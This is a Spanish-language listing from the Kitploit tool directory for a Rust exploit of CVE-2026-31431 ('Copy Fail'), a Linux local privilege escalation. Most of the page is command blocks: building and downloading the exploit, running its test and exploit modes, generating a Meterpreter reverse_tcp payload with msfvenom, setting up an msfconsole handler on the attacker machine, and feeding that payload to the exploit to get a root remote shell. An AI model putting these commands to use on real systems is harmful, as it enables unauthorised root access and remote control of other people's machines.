Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-31431-Linux-Copy-Fail — # Exploit de escalada de privilegios local basado en Rust para CVE-2026-31431, que permite la ejecución de shellcode personalizado como Meterpreter en sistemas Linux. | Kitploit
Herramientas/GitHubGitHub/iss4cf0ng/cve-2026-31431-linux-copy-fail
Escalada de PrivilegiosFrameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónDesarrollo de PayloadsExplotación de Binarios
GitHubiss4cf0ng/cve-2026-31431-linux-copy-fail

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-31431-Linux-Copy-Fail

# Exploit de escalada de privilegios local basado en Rust para CVE-2026-31431, que permite la ejecución de shellcode personalizado como Meterpreter en sistemas Linux.

Ver RepositorioSitio web
5621hace 3 mesesRevisado por Kitploit

CVE-2026-31431 - Exploit Copy-Fail de Linux (Rust)

Una implementación en Rust de un exploit de escalada de privilegios local para CVE-2026-31431 (Copy-Fail).

Permite ejecutar shellcode personalizado (como Meterpreter)

Introducción

Xint reveló CVE-2026-31431, una vulnerabilidad de escritura arbitraria en la caché de páginas que encadena AF_ALG y splice() para lograr una primitiva de escritura de 4 bytes.

Fuente: Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

Aviso legal

Este proyecto fue desarrollado como parte de mi interés personal en el estudio de la ciberseguridad. Sin embargo, podría ser utilizado indebidamente con fines maliciosos.

NO utilice esta herramienta para actividades ilegales.

El autor no es responsable de ningún uso indebido de este software.

Agradecimientos

  • theori-io/copy-fail-CVE-2026-31431

Nota: El trabajo original utiliza shellcode comprimido/codificado (p. ej., /bin/sh). En esta implementación, lo reemplacé con un shellcode /bin/bash sin procesar (sin comprimir), lo que facilita su personalización o su sustitución directa por payloads proporcionados por el usuario.

Cómo compilar

Clone el proyecto y luego ejecute build.sh:

root@kitploit:~
git clone [email protected]:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh

Uso

Descargue y extraiga el paquete de la versión:

root@kitploit:~
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

Los binarios ofrecen las siguientes opciones:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

Demostración

Probar la vulnerabilidad

En la máquina vulnerable:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test

Explotación

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

Use el siguiente comando (establezca PrependSetUid en True) para generar el payload de Meterpreter:

root@kitploit:~
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

En la máquina del atacante (Kali Linux):

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

En la máquina vulnerable:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin

Versiones afectadas

  • Ubuntu
  • Redhat
Descargar herramienta